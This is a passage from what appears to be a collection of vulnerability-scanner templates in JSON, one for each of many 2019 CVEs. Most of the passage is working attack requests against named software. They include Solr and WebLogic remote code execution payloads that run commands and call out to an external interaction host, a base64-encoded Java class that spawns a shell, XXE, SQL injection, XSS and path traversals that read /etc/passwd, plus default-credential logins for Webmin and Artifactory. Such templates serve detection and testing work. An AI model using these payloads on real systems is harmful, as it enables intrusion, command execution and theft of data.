/solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-14322","info":{"name":"Pallets Werkzeug <0.15.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/base_import/static/c:/windows/win.ini","{{BaseURL}}/web/static/c:/windows/win.ini","{{BaseURL}}/base/static/c:/windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17444","info":{"name":"Jfrog Artifactory <6.17.0 - Default Admin Password","severity":"critical"},"requests":[{"raw":["POST /ui/api/v1/ui/auth/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nX-Requested-With: XMLHttpRequest\nOrigin: {{RootURL}}\n\n{\"user\":\"admin\",\"password\":\"password\",\"type\":\"login\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"name\":\"admin\"","\"admin\":true"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1653","info":{"name":"Cisco Small Business WAN VPN Routers - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/config.exp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sysconfig"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14312","info":{"name":"Aptana Jaxer 1.0.3.4547 - Local File inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tools/sourceViewer/index.html?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7543","info":{"name":"KindEditor 4.1.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/kindeditor/php/demo.php","{{BaseURL}}/php/demo.php"],"body":"content1=</script><script>alert(document.domain)</script>&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-7315","info":{"name":"Genie Access WIP3BVAF IP Camera - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12314","info":{"name":"Deltek Maconomy 2.2.5 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16313","info":{"name":"ifw8 Router ROM v4.31 - Credential Discovery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/action/usermanager.htm"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["<td class=\"pwd\" data=\"([a-z]+)\">\\*\\*\\*\\*\\*\\*<\\/td>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["<td class=\"pwd\" data=\"([a-z]+)\">\\*\\*\\*\\*\\*\\*<\\/td>"],"part":"body"}]}]},{"id":"CVE-2019-6802","info":{"name":"Pypiserver <1.2.5 - Carriage Return Line Feed Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;"],"matchers":[{"type":"regex","part":"header","regex":["^Set-Cookie: crlfinjection=1;"]}]}]},{"id":"CVE-2019-8449","info":{"name":"Jira <8.4.0 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/api/latest/groupuserpicker?query=1&maxResults=50000&showAvatar=true"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"users\":{\"users\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18922","info":{"name":"Allied Telesis AT-GS950/8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15642","info":{"name":"Webmin < 1.920 - Authenticated Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /session_login.cgi HTTP/1.1\nHost: {{Hostname}}\nCookie: redirect=1; testing=1\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}\nAccept-Encoding: gzip, deflate\n\nuser={{username}}&pass={{password}}\n","POST /rpc.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{RootURL}}/sysinfo.cgi?xnavigation=1\nAccept-Encoding: gzip, deflate\n\nOBJECT Socket;print \"Content-Type: text/plain\\n\\n\";$cmd={{cmd}};print \"$cmd\\n\\n\";\n"],"attack":"pitchfork","payloads":{"username":["admin","root"],"password":["admin","root"]},"stop-at-first-match":true,"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_2","regex":["uid=(\\d+)\\(.*?\\) gid=(\\d+)\\(.*?\\) groups=(\\d+)\\(.*?\\)"]},{"type":"word","part":"body_2","words":["Content-type: text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16931","info":{"name":"WordPress Visualizer <3.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-json/visualizer/v1/update-chart HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": 7, \"visualizer-chart-type\": \"<script>alert(document.domain)</script>\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"success\":\"Chart updated\"}"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-7609","info":{"name":"Kibana Timelion - Arbitrary Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/timelion/run"],"body":"{\"sheet\":[\".es(*)\"],\"time\":{\"from\":\"now-1m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Asia/Shanghai\"}}","headers":{"Content-Type":"application/json; charset=utf-8"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["seriesList"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-14750","info":{"name":"osTicket < 1.12.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /upload/setup/install.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ns=install&name={{user_name}}&email={{user_email}}&lang_id=en_US&fname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&lname=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3B%3E&admin_email={{user_email}}&username={{user_name}}&passwd={{user_pass}}&passwd2={{user_pass}}&prefix=ost_&dbhost={{dbhost}}&dbname=tt&dbuser={{username}}&dbpass={{password}}&timezone=Asia%2FTokyo\n","GET /upload/scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /upload/scp/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__CSRFToken__={{csrftoken}}&do=scplogin&userid={{user_name}}&passwd={{user_pass}}&ajax=1\n","GET /upload/scp/settings.php HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["<img src=x onerror=alert(1);>","getConfig().resolve"],"condition":"and"},{"type":"word","part":"header_4","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrftoken","part":"body","group":1,"regex":["__CSRFToken__\" value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-17418","info":{"name":"MetInfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["43865094559"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11581","info":{"name":"Atlassian Jira Server-Side Template Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ContactAdministrators!default.jspa"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Contact Site Administrators"]},{"type":"word","part":"body","negative":true,"words":["has not yet configured this contact form"]},{"type":"regex","part":"body","regex":["\\(v4\\.4\\.","\\(v5\\.","\\(v6\\.","\\(v7\\.[012345789]\\.","\\(v7\\.1[0-2]\\.","\\(v7\\.6\\.([0-9]|[1][0-3])","\\(v7\\.\\13\\.[0-4]","\\(v8\\.0\\.[0-2]","\\(v8\\.1\\.[0-1]","\\(v8\\.2\\.[0-2]"],"condition":"or"}]}]},{"id":"CVE-2019-0193","info":{"name":"Apache Solr DataImportHandler <8.2.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n","POST /solr/{{core}}/dataimport?indent=on&wt=json HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/x-www-form-urlencoded\nX-Requested-With: XMLHttpRequest\n\ncommand=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-3396","info":{"name":"Atlassian Confluence Server - Path Traversal","severity":"critical"},"requests":[{"raw":["POST /rest/tinymce/1/macro/preview HTTP/1.1\nHost: {{Hostname}}\nReferer: {{Hostname}}\n\n{\"contentId\":\"786457\",\"macro\":{\"name\":\"widget\",\"body\":\"\",\"params\":{\"url\":\"https://www.viddler.com/v/23464dc5\",\"width\":\"1000\",\"height\":\"1000\",\"_template\":\"../web.xml\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<param-name>contextConfigLocation</param-name>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-11248","info":{"name":"Debug Endpoint pprof - Exposure Detection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/debug/pprof/","{{BaseURL}}/debug/pprof/goroutine?debug=1"],"stop-at-first-match":true,"matchers":[{"type":"word","words":["Types of profiles available:","Profile Descriptions","goroutine profile: total"],"condition":"or"}]}]},{"id":"CVE-2019-17662","info":{"name":"ThinVNC 1.0b1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /{{randstr}}/../../ThinVnc.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["User=","Password="],"condition":"and"},{"type":"word","part":"header","words":["application/binary"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2767","info":{"name":"Oracle Business Intelligence Publisher - XML External Entity Injection","severity":"high"},"requests":[{"raw":["GET /xmlpserver/convert?xml=<%3fxml+version%3d\"1.0\"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+\"http%3a//{{interactsh-url}}/xxe.xml\">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-20141","info":{"name":"WordPress Laborator Neon Theme 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)>","{{BaseURL}}/admin/data/autosuggest-remote.php?q=\"><img%20src=x%20onerror=alert(1)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><img src=x onerror=alert(1)>>)1(trela=rorreno"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2019-1010290","info":{"name":"Babel - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/babel/redirect.php?newurl=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2019-3402","info":{"name":"Jira < 8.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'<script>alert(1)</script>' does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13101","info":{"name":"D-Link DIR-600M - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /wan.htm HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/PPPoE/"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1898","info":{"name":"Cisco RV110W RV130W RV215W Router - Information leakage","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/_syslog.txt"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(to_lower(body), \"ethernet\") && contains(to_lower(body), \"connection\")","contains(header, \"application/octet-stream\")"],"condition":"and"}]}]},{"id":"CVE-2019-15829","info":{"name":"Gallery Photoblocks < 1.1.43 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=photoblocks-edit&id=%22%3E%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"post galleries!\")"],"condition":"and"}]}]},{"id":"CVE-2019-8451","info":{"name":"Jira <8.4.0 - Server-Side Request Forgery","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/plugins/servlet/gadgets/makeRequest"],"body":"url=https://{{Host}}:443@{{interactsh-url}}\n","headers":{"X-Atlassian-Token":"no-check","Content-Type":"application/x-www-form-urlencoded"},"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-3401","info":{"name":"Atlassian Jira <7.13.3/8.0.0-8.1.1 - Incorrect Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ManageFilters.jspa?filter=popular&filterView=popular"],"matchers":[{"type":"word","words":["<span data-filter-field=\"owner-full-name\">","<title>Manage Filters - Jira</title>"],"condition":"and"}]}]},{"id":"CVE-2019-12276","info":{"name":"GrandNode 4.40 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/LetsEncrypt/Index?fileName=/etc/passwd"],"headers":{"Connection":"close"},"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-18665","info":{"name":"DOMOS 5.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-16997","info":{"name":"Metinfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nappno= 1 union SELECT 98989*443131,1&editor=cn&site=web\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["43865094559"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2729","info":{"name":"Oracle WebLogic Server Administration Console - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><class><string>org.slf4j.ext.EventData</string><void><string><![CDATA[<java><void class=\"sun.misc.BASE64Decoder\"><void method=\"decodeBuffer\" id=\"byte_arr\"><string>yv66vgAAADIAYwoAFAA8CgA9AD4KAD0APwoAQABBBwBCCgAFAEMHAEQKAAcARQgARgoABwBHBwBICgALADwKAAsASQoACwBKCABLCgATAEwHAE0IAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEExSZXN1bHRCYXNlRXhlYzsBAAhleGVjX2NtZAEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADY21kAQASTGphdmEvbGFuZy9TdHJpbmc7AQABcAEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANmaXMBABVMamF2YS9pby9JbnB1dFN0cmVhbTsBAANpc3IBABtMamF2YS9pby9JbnB1dFN0cmVhbVJlYWRlcjsBAAJicgEAGExqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyOwEABGxpbmUBAAZyZXN1bHQBAA1TdGFja01hcFRhYmxlBwBRBwBSBwBTBwBCBwBEAQAKRXhjZXB0aW9ucwEAB2RvX2V4ZWMBAAFlAQAVTGphdmEvaW8vSU9FeGNlcHRpb247BwBNBwBUAQAEbWFpbgEAFihbTGphdmEvbGFuZy9TdHJpbmc7KVYBAARhcmdzAQATW0xqYXZhL2xhbmcvU3RyaW5nOwEAClNvdXJjZUZpbGUBAChSZXN1bHRCYXNlRXhlYy5qYXZhIGZyb20gSW5wdXRGaWxlT2JqZWN0DAAVABYHAFUMAFYAVwwAWABZBwBSDABaAFsBABlqYXZhL2lvL0lucHV0U3RyZWFtUmVhZGVyDAAVAFwBABZqYXZhL2lvL0J1ZmZlcmVkUmVhZGVyDAAVAF0BAAAMAF4AXwEAF2phdmEvbGFuZy9TdHJpbmdCdWlsZGVyDABgAGEMAGIAXwEAC2NtZC5leGUgL2MgDAAcAB0BABNqYXZhL2lvL0lPRXhjZXB0aW9uAQALL2Jpbi9zaCAtYyABAA5SZXN1bHRCYXNlRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABBqYXZhL2xhbmcvU3RyaW5nAQARamF2YS9sYW5nL1Byb2Nlc3MBABNqYXZhL2lvL0lucHV0U3RyZWFtAQATamF2YS9sYW5nL0V4Y2VwdGlvbgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAYKExqYXZhL2lvL0lucHV0U3RyZWFtOylWAQATKExqYXZhL2lvL1JlYWRlcjspVgEACHJlYWRMaW5lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAAZhcHBlbmQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcjsBAAh0b1N0cmluZwAhABMAFAAAAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAMAGQAAAAwAAQAAAAUAGgAbAAAACQAcAB0AAgAXAAAA+QADAAcAAABOuAACKrYAA0wrtgAETbsABVkstwAGTrsAB1kttwAIOgQBOgUSCToGGQS2AApZOgXGABy7AAtZtwAMGQa2AA0ZBbYADbYADjoGp//fGQawAAAAAwAYAAAAJgAJAAAABgAIAAcADQAIABYACQAgAAoAIwALACcADAAyAA4ASwARABkAAABIAAcAAABOAB4AHwAAAAgARgAgACEAAQANAEEAIgAjAAIAFgA4ACQAJQADACAALgAmACcABAAjACsAKAAfAAUAJwAnACkAHwAGACoAAAAfAAL/ACcABwcAKwcALAcALQcALgcALwcAKwcAKwAAIwAwAAAABAABABEACQAxAB0AAgAXAAAAqgACAAMAAAA3EglMuwALWbcADBIPtgANKrYADbYADrgAEEynABtNuwALWbcADBIStgANKrYADbYADrgAEEwrsAABAAMAGgAdABEAAwAYAAAAGgAGAAAAFgADABkAGgAeAB0AGwAeAB0ANQAfABkAAAAgAAMAHgAXADIAMwACAAAANwAeAB8AAAADADQAKQAfAAEAKgAAABMAAv8AHQACBwArBwArAAEHADQXADAAAAAEAAEANQAJADYANwACABcAAAArAAAAAQAAAAGxAAAAAgAYAAAABgABAAAANgAZAAAADAABAAAAAQA4ADkAAAAwAAAABAABADUAAQA6AAAAAgA7</string></void></void><void class=\"org.mozilla.classfile.DefiningClassLoader\"><void method=\"defineClass\"><string>ResultBaseExec</string><object idref=\"byte_arr\"></object><void method=\"newInstance\"><void method=\"do_exec\" id=\"result\"><string>echo${IFS}COP-9272-9102-EVC|rev</string></void></void></void></void><void class=\"java.lang.Thread\" method=\"currentThread\"><void method=\"getCurrentWork\" id=\"current_work\"><void method=\"getClass\"><void method=\"getDeclaredField\"><string>connectionHandler</string><void method=\"setAccessible\"><boolean>true</boolean></void><void method=\"get\"><object idref=\"current_work\"></object><void method=\"getServletRequest\"><void method=\"getResponse\"><void method=\"getServletOutputStream\"><void method=\"writeStream\"><object class=\"weblogic.xml.util.StringInputStream\"><object idref=\"result\"></object></object></void><void method=\"flush\"/></void><void method=\"getWriter\"><void method=\"write\"><string></string></void></void></void></void></void></void></void></void></void></java>]]></string></void></class></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n","POST /_async/AsyncResponseService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\n\n<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:wsa=\"http://www.w3.org/2005/08/addressing\" xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\"><soapenv:Header><wsa:Action>xx</wsa:Action><wsa:RelatesTo>xx</wsa:RelatesTo><work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"><java><array method=\"forName\"><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void><array class=\"byte\" length=\"3478\"><void index=\"0\"><byte>-84</byte></void><void index=\"1\"><byte>-19</byte></void><void index=\"2\"><byte>0</byte></void><void index=\"3\"><byte>5</byte></void><void index=\"4\"><byte>115</byte></void><void index=\"5\"><byte>114</byte></void><void index=\"6\"><byte>0</byte></void><void index=\"7\"><byte>23</byte></void><void index=\"8\"><byte>106</byte></void><void index=\"9\"><byte>97</byte></void><void index=\"10\"><byte>118</byte></void><void index=\"11\"><byte>97</byte></void><void index=\"12\"><byte>46</byte></void><void index=\"13\"><byte>117</byte></void><void index=\"14\"><byte>116</byte></void><void index=\"15\"><byte>105</byte></void><void index=\"16\"><byte>108</byte></void><void index=\"17\"><byte>46</byte></void><void index=\"18\"><byte>76</byte></void><void index=\"19\"><byte>105</byte></void><void index=\"20\"><byte>110</byte></void><void index=\"21\"><byte>107</byte></void><void index=\"22\"><byte>101</byte></void><void index=\"23\"><byte>100</byte></void><void index=\"24\"><byte>72</byte></void><void index=\"25\"><byte>97</byte></void><void index=\"26\"><byte>115</byte></void><void index=\"27\"><byte>104</byte></void><void index=\"28\"><byte>83</byte></void><void index=\"29\"><byte>101</byte></void><void index=\"30\"><byte>116</byte></void><void index=\"31\"><byte>-40</byte></void><void index=\"32\"><byte>108</byte></void><void index=\"33\"><byte>-41</byte></void><void index=\"34\"><byte>90</byte></void><void index=\"35\"><byte>-107</byte></void><void index=\"36\"><byte>-35</byte></void><void index=\"37\"><byte>42</byte></void><void index=\"38\"><byte>30</byte></void><void index=\"39\"><byte>2</byte></void><void index=\"40\"><byte>0</byte></void><void index=\"41\"><byte>0</byte></void><void index=\"42\"><byte>120</byte></void><void index=\"43\"><byte>114</byte></void><void index=\"44\"><byte>0</byte></void><void index=\"45\"><byte>17</byte></void><void index=\"46\"><byte>106</byte></void><void index=\"47\"><byte>97</byte></void><void index=\"48\"><byte>118</byte></void><void index=\"49\"><byte>97</byte></void><void index=\"50\"><byte>46</byte></void><void index=\"51\"><byte>117</byte></void><void index=\"52\"><byte>116</byte></void><void index=\"53\"><byte>105</byte></void><void index=\"54\"><byte>108</byte></void><void index=\"55\"><byte>46</byte></void><void index=\"56\"><byte>72</byte></void><void index=\"57\"><byte>97</byte></void><void index=\"58\"><byte>115</byte></void><void index=\"59\"><byte>104</byte></void><void index=\"60\"><byte>83</byte></void><void index=\"61\"><byte>101</byte></void><void index=\"62\"><byte>116</byte></void><void index=\"63\"><byte>-70</byte></void><void index=\"64\"><byte>68</byte></void><void index=\"65\"><byte>-123</byte></void><void index=\"66\"><byte>-107</byte></void><void index=\"67\"><byte>-106</byte></void><void index=\"68\"><byte>-72</byte></void><void index=\"69\"><byte>-73</byte></void><void index=\"70\"><byte>52</byte></void><void index=\"71\"><byte>3</byte></void><void index=\"72\"><byte>0</byte></void><void index=\"73\"><byte>0</byte></void><void index=\"74\"><byte>120</byte></void><void index=\"75\"><byte>112</byte></void><void index=\"76\"><byte>119</byte></void><void index=\"77\"><byte>12</byte></void><void index=\"78\"><byte>0</byte></void><void index=\"79\"><byte>0</byte></void><void index=\"80\"><byte>0</byte></void><void index=\"81\"><byte>16</byte></void><void index=\"82\"><byte>63</byte></void><void index=\"83\"><byte>64</byte></void><void index=\"84\"><byte>0</byte></void><void index=\"85\"><byte>0</byte></void><void index=\"86\"><byte>0</byte></void><void index=\"87\"><byte>0</byte></void><void index=\"88\"><byte>0</byte></void><void index=\"89\"><byte>2</byte></void><void index=\"90\"><byte>115</byte></void><void index=\"91\"><byte>114</byte></void><void index=\"92\"><byte>0</byte></void><void index=\"93\"><byte>58</byte></void><void index=\"94\"><byte>99</byte></void><void index=\"95\"><byte>111</byte></void><void index=\"96\"><byte>109</byte></void><void index=\"97\"><byte>46</byte></void><void index=\"98\"><byte>115</byte></void><void index=\"99\"><byte>117</byte></void><void index=\"100\"><byte>110</byte></void><void index=\"101\"><byte>46</byte></void><void index=\"102\"><byte>111</byte></void><void index=\"103\"><byte>114</byte></void><void index=\"104\"><byte>103</byte></void><void index=\"105\"><byte>46</byte></void><void index=\"106\"><byte>97</byte></void><void index=\"107\"><byte>112</byte></void><void index=\"108\"><byte>97</byte></void><void index=\"109\"><byte>99</byte></void><void index=\"110\"><byte>104</byte></void><void index=\"111\"><byte>101</byte></void><void index=\"112\"><byte>46</byte></void><void index=\"113\"><byte>120</byte></void><void index=\"114\"><byte>97</byte></void><void index=\"115\"><byte>108</byte></void><void index=\"116\"><byte>97</byte></void><void index=\"117\"><byte>110</byte></void><void 